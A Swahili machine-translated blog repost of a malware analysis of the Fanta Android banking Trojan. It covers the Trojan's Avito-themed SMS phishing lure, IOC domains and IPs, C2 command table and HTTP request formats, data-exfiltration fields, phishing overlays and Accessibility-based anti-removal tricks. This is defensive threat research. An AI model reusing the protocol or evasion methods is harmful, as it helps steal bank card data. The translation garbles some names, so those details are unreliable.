ProHoster > blog > habari za mtandao > Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android

Siku moja unataka kuuza kitu kwenye Avito na, baada ya kuchapisha maelezo ya kina ya bidhaa yako (kwa mfano, moduli ya RAM), utapokea ujumbe huu:

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya AndroidMara tu unapofungua kiungo, utaona ukurasa unaoonekana kutokuwa na hatia ukikujulisha, muuzaji mwenye furaha na aliyefanikiwa, kwamba ununuzi umefanywa:

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android
Mara tu unapobofya kitufe cha "Endelea", faili ya APK iliyo na ikoni na jina la kutia moyo itapakuliwa kwenye kifaa chako cha Android. Ulisakinisha programu ambayo kwa sababu fulani iliomba haki za Huduma ya Upatikanaji, kisha madirisha kadhaa yalionekana na kutoweka haraka na... Hiyo ndiyo yote.

Unaenda kuangalia salio lako, lakini kwa sababu fulani programu yako ya benki inakuuliza tena maelezo ya kadi yako. Baada ya kuingia data, kitu cha kutisha kinatokea: kwa sababu fulani bado haijulikani kwako, pesa huanza kutoweka kutoka kwa akaunti yako. Unajaribu kutatua tatizo, lakini simu yako inapinga: inabonyeza funguo za "Nyuma" na "Nyumbani", haizimi na haikuruhusu kuamsha hatua zozote za usalama. Matokeo yake, umeachwa bila pesa, bidhaa zako hazijanunuliwa, umechanganyikiwa na unashangaa: ni nini kilichotokea?

Jibu ni rahisi: umekuwa mwathirika wa Android Trojan Fanta, mwanachama wa familia ya Flexnet. Hii ilitokeaje? Hebu tueleze sasa.

Waandishi: Andrey Polovinkin, mtaalamu mdogo katika uchambuzi wa programu hasidi, Ivan Pisarev, mtaalamu wa uchambuzi wa programu hasidi.

Takwimu kadhaa

Familia ya Flexnet ya Android Trojans ilijulikana kwa mara ya kwanza mnamo 2015. Kwa kipindi kirefu cha shughuli, familia ilipanuka hadi kwa spishi ndogo kadhaa: Fanta, Limebot, Lipton, nk. Trojan, pamoja na miundombinu inayohusiana nayo, haisimama tuli: miradi mipya ya usambazaji yenye ufanisi inatengenezwa - kwa upande wetu, kurasa za ubora wa juu za ulaghai zinazolenga muuzaji maalum wa mtumiaji, na watengenezaji wa Trojan wanafuata mitindo ya kisasa katika uandishi wa virusi - kuongeza utendakazi mpya unaowezesha kuiba pesa kwa ufanisi zaidi kutoka kwa vifaa vilivyoambukizwa na mifumo ya ulinzi ya kupita.

Kampeni iliyoelezwa katika makala haya inalenga watumiaji kutoka Urusi; idadi ndogo ya vifaa vilivyoambukizwa vilirekodiwa nchini Ukraini, na wachache zaidi katika Kazakhstan na Belarus.

Ingawa Flexnet imekuwa kwenye uwanja wa Trojan ya Android kwa zaidi ya miaka 4 sasa na imechunguzwa kwa kina na watafiti wengi, bado iko katika hali nzuri. Kuanzia Januari 2019, kiasi kinachowezekana cha uharibifu ni zaidi ya rubles milioni 35 - na hii ni kwa kampeni tu nchini Urusi. Mnamo mwaka wa 2015, matoleo mbalimbali ya Trojan hii ya Android yaliuzwa kwenye vikao vya chini ya ardhi, ambapo msimbo wa chanzo wa Trojan wenye maelezo ya kina pia unaweza kupatikana. Hii ina maana kwamba takwimu za uharibifu duniani zinavutia zaidi. Sio kiashiria mbaya kwa mzee kama huyo, sivyo?

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android

Kutoka kwa uuzaji hadi udanganyifu

Kama inavyoonekana kutoka kwa picha ya skrini iliyowasilishwa hapo awali ya ukurasa wa kuhadaa ili kupata maelezo ya kibinafsi kwa huduma ya mtandao kwa ajili ya kuchapisha matangazo ya Avito, ilitayarishwa kwa ajili ya mwathirika mahususi. Inavyoonekana, washambuliaji hutumia moja ya vichanganuzi vya Avito, ambayo hutoa nambari ya simu na jina la muuzaji, pamoja na maelezo ya bidhaa. Baada ya kupanua ukurasa na kuandaa faili ya APK, mhasiriwa hutumwa SMS kwa jina lake na kiungo kwenye ukurasa wa ulaghai ulio na maelezo ya bidhaa yake na kiasi kilichopokelewa kutoka kwa "mauzo" ya bidhaa. Kwa kubofya kitufe, mtumiaji anapokea faili mbaya ya APK - Fanta.

Utafiti wa kikoa cha shcet491[.]ru ulionyesha kuwa kimekabidhiwa kwa seva za DNS za Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Faili ya eneo la kikoa ina maingizo yanayoelekeza kwa anwani za IP 31.220.23[.]236, 31.220.23[.]243, na 31.220.23[.]235. Hata hivyo, rekodi ya rasilimali msingi ya kikoa (Rekodi) inaelekeza kwenye seva iliyo na anwani ya IP 178.132.1[.]240.

Anwani ya IP 178.132.1[.]240 iko nchini Uholanzi na ni ya mwenyeji. WorldStream. Anwani za IP 31.220.23[.]235, 31.220.23[.]236 na 31.220.23[.]243 ziko nchini Uingereza na ni za seva mwenyeji iliyoshirikiwa HOSTINGER. Inatumika kama kinasa sauti openprov-ru. Vikoa vifuatavyo pia vilitatuliwa kwa anwani ya IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Ikumbukwe kwamba viungo katika muundo ufuatao vilipatikana kutoka karibu vikoa vyote:

http://(www.){0,1}<%domain%>/[0-9]{7}

Kiolezo hiki pia kinajumuisha kiungo kutoka kwa ujumbe wa SMS. Kulingana na data ya kihistoria, iligundua kuwa kikoa kimoja kinalingana na viungo kadhaa katika muundo ulioelezwa hapo juu, ambao unaonyesha kuwa kikoa kimoja kilitumiwa kusambaza Trojan kwa waathirika kadhaa.

Wacha turukie mbele kidogo: Trojan iliyopakuliwa kupitia kiunga kutoka kwa SMS hutumia anwani kama seva ya kudhibiti. onusedseddohap[.]club. Kikoa hiki kilisajiliwa 2019-03-12, na kuanzia 2019-04-29, programu za APK zilitumia kikoa hiki. Kulingana na data iliyopatikana kutoka kwa VirusTotal, jumla ya programu 109 ziliingiliana na seva hii. Kikoa chenyewe kilitatuliwa kwa anwani ya IP 217.23.14[.]27, iliyoko Uholanzi na inayomilikiwa na mwenyeji WorldStream. Inatumika kama kinasa sauti jina la bei. Vikoa pia vimetatuliwa kwa anwani hii ya IP klabu mbaya[.]klabu (kuanzia 2018-09-25) na bad-racoon[.]live (kuanzia 2018-10-25). Na kikoa klabu mbaya[.]klabu zaidi ya faili 80 za APK zilizotumiwa bad-racoon[.]live - zaidi ya 100.

Kwa ujumla, mashambulizi yanaendelea kama ifuatavyo:

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android

Ni nini chini ya kifuniko cha Fanta?

Kama vile Trojans nyingine nyingi za Android, Fanta ina uwezo wa kusoma na kutuma ujumbe wa SMS, kufanya maombi ya USSD, na kuonyesha madirisha yake juu ya programu (pamoja na za benki). Walakini, safu ya utendakazi ya familia hii imefika: Fanta ilianza kutumia Huduma ya Ufikivu kwa madhumuni mbalimbali: kusoma yaliyomo ya arifa kutoka kwa programu nyingine, kuzuia kugundua na kusimamisha utekelezaji wa Trojan kwenye kifaa kilichoambukizwa, nk. Fanta hufanya kazi kwenye matoleo yote ya Android yasiyo chini ya 4.4. Katika nakala hii tutaangalia kwa karibu sampuli ifuatayo ya Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Mara baada ya uzinduzi

Mara tu baada ya uzinduzi, Trojan inaficha ikoni yake. Programu inaweza kufanya kazi tu ikiwa jina la kifaa kilichoambukizwa haliko kwenye orodha:

  • admin_x86
  • VirtualBox
  • Nexus 5X (kichwa cha ng'ombe)
  • Nexus 5(wembe)

Cheki hii inafanywa katika huduma kuu ya Trojan - Huduma Kuu. Inapozinduliwa kwa mara ya kwanza, vigezo vya usanidi wa programu huanzishwa kwa maadili chaguo-msingi (muundo wa kuhifadhi data ya usanidi na maana yake itajadiliwa baadaye), na kifaa kipya kilichoambukizwa kinasajiliwa kwenye seva ya kudhibiti. Ombi la HTTP POST lenye aina ya ujumbe litatumwa kwa seva sajili_bot na taarifa kuhusu kifaa kilichoambukizwa (toleo la Android, IMEI, nambari ya simu, jina la opereta na msimbo wa nchi ambamo opereta amesajiliwa). Anwani hutumika kama seva ya kudhibiti hXXp://onuseseddohap[.]club/controller.php. Kwa kujibu, seva hutuma ujumbe ulio na uwanja bot_id, bot_pwd, server - programu huhifadhi maadili haya kama vigezo vya seva ya CnC. Kigezo server hiari ikiwa uwanja haukupokelewa: Fanta hutumia anwani ya usajili - hXXp://onuseseddohap[.]club/controller.php. Kazi ya kubadilisha anwani ya CnC inaweza kutumika kutatua matatizo mawili: kusambaza mzigo sawasawa kati ya seva kadhaa (ikiwa kuna idadi kubwa ya vifaa vilivyoambukizwa, mzigo kwenye seva isiyoboreshwa inaweza kuwa ya juu), na pia kutumia. seva mbadala katika tukio la kushindwa kwa mojawapo ya seva za CnC .

Ikiwa hitilafu itatokea wakati wa kutuma ombi, Trojan itarudia mchakato wa usajili baada ya sekunde 20.

Kifaa kikishasajiliwa kwa ufanisi, Fanta itaonyesha ujumbe ufuatao kwa mtumiaji:

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android
Kumbuka muhimu: huduma inaitwa Usalama wa Mfumo - jina la huduma ya Trojan, na baada ya kubofya kitufe OK Dirisha litafunguliwa na mipangilio ya Ufikivu ya kifaa kilichoambukizwa, ambapo mtumiaji lazima atoe haki za Ufikivu kwa huduma hasidi:

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android
Mara tu mtumiaji anapowasha Huduma ya Ufikivu, Fanta inapata ufikiaji wa yaliyomo kwenye madirisha ya programu na vitendo vinavyofanywa ndani yake:

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android
Mara tu baada ya kupokea haki za Ufikivu, Trojan huomba haki za msimamizi na haki za kusoma arifa:

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android
Kwa kutumia Huduma ya Ufikivu, programu huiga vibonye vya vitufe, na hivyo kujipa haki zote muhimu.

Fanta huunda matukio mengi ya hifadhidata (ambayo yataelezwa baadaye) muhimu ili kuhifadhi data ya usanidi, pamoja na taarifa iliyokusanywa katika mchakato kuhusu kifaa kilichoambukizwa. Ili kutuma taarifa zilizokusanywa, Trojan huunda kazi ya kurudia iliyoundwa ili kupakua mashamba kutoka kwa hifadhidata na kupokea amri kutoka kwa seva ya kudhibiti. Muda wa kufikia CnC umewekwa kulingana na toleo la Android: katika kesi ya 5.1, muda utakuwa sekunde 10, vinginevyo sekunde 60.

Ili kupokea amri, Fanta hufanya ombi GetTask kwa seva ya usimamizi. Kwa kujibu, CnC inaweza kutuma moja ya amri zifuatazo:

Timu Description
0 Tuma ujumbe wa SMS
1 Piga simu au amri ya USSD
2 Inasasisha kigezo Interval
3 Inasasisha kigezo kuepuka
6 Inasasisha kigezo smsMeneja
9 Anza kukusanya ujumbe wa SMS
11 Weka upya simu yako kwa mipangilio ya kiwanda
12 Washa/Zima uwekaji kumbukumbu wa kuunda kisanduku cha mazungumzo

Fanta pia hukusanya arifa kutoka kwa programu 70 za benki, mifumo ya malipo ya haraka na pochi za kielektroniki na kuzihifadhi kwenye hifadhidata.

Kuhifadhi vigezo vya usanidi

Ili kuhifadhi vigezo vya usanidi, Fanta hutumia mbinu ya kawaida ya jukwaa la Android - mapendekezo-mafaili. Mipangilio itahifadhiwa kwa faili iliyopewa jina mazingira. Maelezo ya vigezo vilivyohifadhiwa iko kwenye jedwali hapa chini.

jina Thamani chaguomsingi Thamani zinazowezekana Description
id 0 Integer Kitambulisho cha Kijibu
server hXXp://onuseseddohap[.]club/ URL Dhibiti anwani ya seva
pwd - Kamba Nenosiri la seva
Interval 20 Integer Muda wa muda. Inaonyesha muda gani kazi zifuatazo zinapaswa kuahirishwa:

  • Wakati wa kutuma ombi kuhusu hali ya ujumbe wa SMS uliotumwa
  • Kupokea amri mpya kutoka kwa seva ya usimamizi
kuepuka zote zote/telNumber Ikiwa shamba ni sawa na kamba zote au nambari ya simu, basi ujumbe wa SMS uliopokelewa utaingiliwa na programu na hauonyeshwa kwa mtumiaji
smsMeneja 0 0/1 Washa/zima programu kama mpokeaji chaguomsingi wa SMS
somaDialog uongo Kweli/uongo Washa/Zima ukataji wa tukio AccessibilityEvent

Fanta pia hutumia faili smsMeneja:

jina Thamani chaguomsingi Thamani zinazowezekana Description
pckg - Kamba Jina la kidhibiti ujumbe wa SMS lililotumika

Mwingiliano na hifadhidata

Wakati wa operesheni yake, Trojan hutumia hifadhidata mbili. Hifadhidata iliyopewa jina a kutumika kuhifadhi taarifa mbalimbali zilizokusanywa kutoka kwa simu. Database ya pili inaitwa fanta.db na hutumika kuhifadhi mipangilio inayowajibika kuunda madirisha ya kuhadaa ili kupata maelezo ya kibinafsi yaliyoundwa kukusanya taarifa kuhusu kadi za benki.

Trojan hutumia hifadhidata а kuhifadhi habari iliyokusanywa na kuweka vitendo vyako. Data imehifadhiwa kwenye jedwali magogo. Ili kuunda jedwali, tumia swali lifuatalo la SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Hifadhidata ina habari ifuatayo:

1. Kuweka kumbukumbu ya kuanza kwa kifaa kilichoambukizwa kwa ujumbe Simu ikawashwa!

2. Arifa kutoka kwa programu. Ujumbe unatolewa kulingana na template ifuatayo:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Data ya kadi ya benki kutoka kwa fomu za hadaa zilizoundwa na Trojan. Kigezo VIEW_NAME inaweza kuwa mojawapo ya yafuatayo:

  • AliExpress
  • Avito
  • Google Play
  • Nyingine <%App Name%>

Ujumbe umeingia katika umbizo:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Ujumbe wa SMS unaoingia/unaotoka katika umbizo:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Taarifa kuhusu kifurushi kinachounda kisanduku cha mazungumzo katika umbizo:

(<%Package name%>)<%Package information%>

Jedwali la mfano magogo:

Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android
Moja ya utendaji wa Fanta ni mkusanyiko wa habari kuhusu kadi za benki. Mkusanyiko wa data hutokea kwa kuunda madirisha ya ulaghai wakati wa kufungua programu za benki. Trojan huunda dirisha la hadaa mara moja tu. Habari ambayo dirisha ilionyeshwa kwa mtumiaji imehifadhiwa kwenye jedwali mazingira katika hifadhidata fanta.db. Ili kuunda hifadhidata, tumia swali lifuatalo la SQL:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Sehemu zote za meza mazingira kwa chaguo-msingi kuanzishwa hadi 1 (unda dirisha la hadaa). Baada ya mtumiaji kuingiza data yake, thamani itawekwa 0. Mfano wa sehemu za meza mazingira:

  • unaweza_kuingia - uwanja una jukumu la kuonyesha fomu wakati wa kufungua maombi ya benki
  • benki_ya_kwanza - haitumiki
  • anaweza_avito - uwanja una jukumu la kuonyesha fomu wakati wa kufungua programu ya Avito
  • anaweza_ali - shamba linawajibika kwa kuonyesha fomu wakati wa kufungua programu ya Aliexpress
  • unaweza_mwingine - uwanja una jukumu la kuonyesha fomu wakati wa kufungua programu yoyote kutoka kwenye orodha: Yula, Pandao, Drom Auto, Wallet. Kadi za punguzo na bonasi, Aviasales, Uhifadhi, Trivago
  • inaweza_kadi - uwanja una jukumu la kuonyesha fomu wakati wa kufungua Google Play

Mwingiliano na seva ya usimamizi

Mwingiliano wa mtandao na seva ya usimamizi hutokea kupitia itifaki ya HTTP. Kufanya kazi na mtandao, Fanta hutumia maktaba maarufu ya Retrofit. Maombi yanatumwa kwa: hXXp://onuseseddohap[.]club/controller.php. Anwani ya seva inaweza kubadilishwa wakati wa kusajili kwenye seva. Vidakuzi vinaweza kutumwa kama jibu kutoka kwa seva. Fanta hufanya maombi yafuatayo kwa seva:

  • Usajili wa bot kwenye seva ya kudhibiti hutokea mara moja, wakati wa uzinduzi wa kwanza. Data ifuatayo kuhusu kifaa kilichoambukizwa hutumwa kwa seva:
    · Cookie - vidakuzi vilivyopokelewa kutoka kwa seva (thamani chaguo-msingi ni kamba tupu)
    · mode - kamba ya mara kwa mara sajili_bot
    · kiambishi awali - nambari kamili 2
    · toleo_sdk - imeundwa kulingana na template ifuatayo: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI ya kifaa kilichoambukizwa
    · nchi - msimbo wa nchi ambayo operator amesajiliwa, katika muundo wa ISO
    · idadi - nambari ya simu
    · operator - jina la mwendeshaji

    Mfano wa ombi lililotumwa kwa seva:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Kwa kujibu ombi, seva lazima irudishe kitu cha JSON kilicho na vigezo vifuatavyo:
    · bot_id - Kitambulisho cha kifaa kilichoambukizwa. Ikiwa bot_id ni sawa na 0, Fanta itatekeleza ombi tena.
    bot_pwd — nenosiri la seva.
    seva - dhibiti anwani ya seva. Kigezo cha hiari. Ikiwa parameta haijabainishwa, anwani iliyohifadhiwa kwenye programu itatumika.

    Mfano wa kitu cha JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Ombi la kupokea amri kutoka kwa seva. Data ifuatayo inatumwa kwa seva:
    · Cookie - vidakuzi vilivyopokelewa kutoka kwa seva
    · jitihada - kitambulisho cha kifaa kilichoambukizwa ambacho kilipokelewa wakati wa kutuma ombi sajili_bot
    · pwd -Nenosiri la seva
    · divivice_admin - uwanja huamua ikiwa haki za msimamizi zimepatikana. Ikiwa haki za msimamizi zimepatikana, shamba ni sawa na 1, vinginevyo 0
    · Upatikanaji - Hali ya uendeshaji wa Huduma ya Upatikanaji. Ikiwa huduma ilianzishwa, thamani ni 1, vinginevyo 0
    · Msimamizi wa SMS — huonyesha kama Trojan imewezeshwa kama programu-msingi ya kupokea SMS
    · screen - huonyesha hali ambayo skrini iko. Thamani itawekwa 1, ikiwa skrini imewashwa, vinginevyo 0;

    Mfano wa ombi lililotumwa kwa seva:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Kulingana na amri, seva inaweza kurudisha kitu cha JSON na vigezo tofauti:

    · Timu Tuma ujumbe wa SMS: Vigezo vina nambari ya simu, maandishi ya ujumbe wa SMS na kitambulisho cha ujumbe unaotumwa. Kitambulisho hutumiwa wakati wa kutuma ujumbe kwa seva na aina setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Timu Piga simu au amri ya USSD: Nambari ya simu au amri huja katika mwili wa majibu. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Timu Badilisha kigezo cha muda. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Timu Badilisha kigezo cha kukatiza. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Timu Badilisha sehemu ya Kidhibiti cha Sms. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Timu Kusanya ujumbe wa SMS kutoka kwa kifaa kilichoambukizwa.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Timu Weka upya simu yako kwa mipangilio ya kiwanda: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Timu Badilisha kigezo cha ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Kutuma ujumbe na aina setSmsStatus. Ombi hili hufanywa baada ya amri kutekelezwa Tuma ujumbe wa SMS. Ombi linaonekana kama hii:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Inapakia yaliyomo kwenye hifadhidata. Safu mlalo moja hutumwa kwa kila ombi. Data ifuatayo inatumwa kwa seva:
    · Cookie - vidakuzi vilivyopokelewa kutoka kwa seva
    · mode - kamba ya mara kwa mara wekaSaveInboxSms
    · jitihada - kitambulisho cha kifaa kilichoambukizwa ambacho kilipokelewa wakati wa kutuma ombi sajili_bot
    · Nakala - maandishi katika rekodi ya sasa ya hifadhidata (uwanja d kutoka kwa meza magogo katika hifadhidata а)
    · idadi - jina la rekodi ya sasa ya hifadhidata (uwanja p kutoka kwa meza magogo katika hifadhidata а)
    · sms_mode - thamani kamili (uwanja m kutoka kwa meza magogo katika hifadhidata а)

    Ombi linaonekana kama hii:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Ikiwa imetumwa kwa seva kwa ufanisi, safu mlalo itafutwa kwenye jedwali. Mfano wa kitu cha JSON kilichorejeshwa na seva:

    {
    "response":[],
    "status":"ok"
}

Kuingiliana na AccessibilityService

AccessibilityService ilitekelezwa ili kurahisisha kutumia vifaa vya Android kwa watu wenye ulemavu. Katika hali nyingi, mwingiliano wa kimwili unahitajika ili kuingiliana na programu. AccessibilityService hukuruhusu kuzifanya kwa utaratibu. Fanta hutumia huduma kuunda madirisha bandia katika programu za benki na kuzuia watumiaji kufungua mipangilio ya mfumo na baadhi ya programu.

Kwa kutumia utendakazi wa Huduma ya Ufikivu, Trojan hufuatilia mabadiliko kwenye vipengee kwenye skrini ya kifaa kilichoambukizwa. Kama ilivyoelezwa hapo awali, mipangilio ya Fanta ina kigezo kinachohusika na shughuli za ukataji miti na visanduku vya mazungumzo - somaDialog. Ikiwa kigezo hiki kitawekwa, maelezo kuhusu jina na maelezo ya kifurushi kilichoanzisha tukio yataongezwa kwenye hifadhidata. Trojan hufanya vitendo vifuatavyo matukio yanapoanzishwa:

  • Huiga kubonyeza funguo za nyuma na za nyumbani katika hali zifuatazo:
    · ikiwa mtumiaji anataka kuwasha tena kifaa chake
    · ikiwa mtumiaji anataka kufuta programu ya "Avito" au kubadilisha haki za ufikiaji
    · ikiwa kuna kutajwa kwa programu ya "Avito" kwenye ukurasa
    · unapofungua programu ya Google Play Protect
    · unapofungua kurasa zilizo na mipangilio ya Huduma ya Upatikanaji
    · wakati sanduku la mazungumzo ya Usalama wa Mfumo linaonekana
    · wakati wa kufungua ukurasa na mipangilio ya "Chora juu ya programu nyingine".
    · wakati wa kufungua ukurasa wa "Programu", "Rejesha na uweke upya", "Rudisha data", "Weka upya mipangilio", "Jopo la Msanidi", "Maalum. fursa”, “Fursa Maalum”, “Haki Maalum”
    · ikiwa tukio lilitolewa na programu fulani.

    Orodha ya maombi

    • admin
    • Mwalimu Lite
    • Safi bwana
    • Safi Master kwa x86 CPU
    • Usimamizi wa Ruhusa ya Maombi ya Meizu
    • Usalama wa MIUI
    • Safi Master - Antivirus & Cache na Kisafisha Taka
    • Udhibiti wa wazazi na GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Kisafishaji Virusi, Antivirus, Kisafishaji (Usalama wa MAX)
    • Programu ya Usalama ya Antivirus ya Simu ya Mkononi
    • Antivirus ya Avast na kinga ya bure ya 2019
    • MegaFon ya Usalama wa Simu
    • Ulinzi wa AVG kwa Xperia
    • Usalama wa Simu ya Mkononi
    • Kinga na kinga ya Malwarebytes
    • Antivirus ya Android 2019
    • Mwalimu wa Usalama - Antivirus, VPN, AppLock, Booster
    • Antivirus ya AVG ya Kidhibiti cha Mfumo wa kompyuta ya kibao ya Huawei
    • Ufikivu wa Samsung
    • Samsung Smart Meneja
    • Mwalimu wa Usalama
    • Nyongeza ya kasi
    • Dk Web
    • Nafasi ya Usalama ya Mtandao ya Dk
    • Kituo cha Kudhibiti cha Simu ya Dr.Web
    • Dr.Web Security Space Life
    • Kituo cha Kudhibiti cha Simu ya Dr.Web
    • Antivirus na Usalama wa rununu
    • Usalama wa Mtandaoni wa Kaspersky: Antivirus na Ulinzi
    • Maisha ya Betri ya Kaspersky: Saver & Booster
    • Usalama wa Kaspersky Endpoint - ulinzi na usimamizi
    • AVG Antivirus bure 2019 - Ulinzi wa Android
    • Antivirus Android
    • Usalama wa Simu ya Norton na Antivirus
    • Antivirus, firewall, VPN, usalama wa simu
    • Usalama wa Simu ya Mkononi: antivirus, VPN, ulinzi wa wizi
    • Antivirus kwa Android

  • Ikiwa ruhusa itaombwa wakati wa kutuma ujumbe wa SMS kwa nambari fupi, Fanta huiga kubofya kisanduku cha kuteua Kumbuka chaguo na kifungo kutuma.
  • Unapojaribu kuondoa haki za msimamizi kutoka kwa Trojan, hufunga skrini ya simu.
  • Huzuia kuongeza wasimamizi wapya.
  • Ikiwa programu ya antivirus dr.web amegundua tishio, Fanta anaiga kubonyeza kitufe kupuuza.
  • Trojan inaiga kubonyeza kitufe cha nyuma na cha nyumbani ikiwa tukio lilitolewa na programu Samsung Device Care.
  • Fanta huunda madirisha ya kuhadaa ili kupata maelezo ya kibinafsi na fomu za kuingiza taarifa kuhusu kadi za benki ikiwa programu kutoka kwa orodha ya huduma 30 tofauti za Intaneti ilizinduliwa. Miongoni mwao: AliExpress, Booking, Avito, Sehemu ya Soko la Google Play, Pandao, Drom Auto, nk.

    Fomu za kuhadaa

    Fanta huchanganua ni programu zipi zinazoendeshwa kwenye kifaa kilichoambukizwa. Ikiwa utumaji wa riba ulifunguliwa, Trojan inaonyesha dirisha la hadaa juu ya zingine zote, ambayo ni fomu ya kuingiza habari ya kadi ya benki. Mtumiaji lazima aweke data ifuatayo:

    • Namba ya kadi
    • Tarehe ya kuisha kwa kadi
    • CVV
    • Jina la mwenye kadi (si la benki zote)

    Kulingana na programu inayoendesha, madirisha tofauti ya hadaa yataonyeshwa. Ifuatayo ni mifano ya baadhi yao:

    AliExpress:

    Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android
    Avito:

    Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android
    Kwa baadhi ya maombi mengine, k.m. Soko la Google Play, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: mbinu mpya za Trojan ya zamani ya Android

    Jinsi ilivyokuwa kweli

    Kwa bahati nzuri, mtu aliyepokea ujumbe wa SMS ulioelezwa mwanzoni mwa makala hiyo aligeuka kuwa mtaalamu wa usalama wa mtandao. Kwa hiyo, toleo la kweli, lisilo la mkurugenzi linatofautiana na lile lililoelezwa hapo awali: mtu alipokea SMS ya kuvutia, baada ya hapo akawapa timu ya Ujasusi wa Uwindaji wa Tishio la Kundi-IB. Matokeo ya shambulio hilo ni makala hii. Mwisho wa furaha, sivyo? Walakini, sio hadithi zote zinazoisha kwa mafanikio, na ili yako isionekane kama kukata kwa mkurugenzi na upotezaji wa pesa, katika hali nyingi inatosha kufuata sheria zifuatazo zilizoelezewa kwa muda mrefu:

    • usisakinishe programu za simu ya mkononi yenye Mfumo wa Uendeshaji wa Android kutoka vyanzo vingine isipokuwa Google Play
    • Wakati wa kusanikisha programu, zingatia sana haki zilizoombwa na programu
    • makini na upanuzi wa faili zilizopakuliwa
    • sakinisha masasisho ya Mfumo wa Uendeshaji wa Android mara kwa mara
    • usitembelee rasilimali zinazotiliwa shaka na usipakue faili kutoka hapo
    • Usibofye viungo vilivyopokelewa katika ujumbe wa SMS.

Chanzo: mapenzi.com

Kuongeza maoni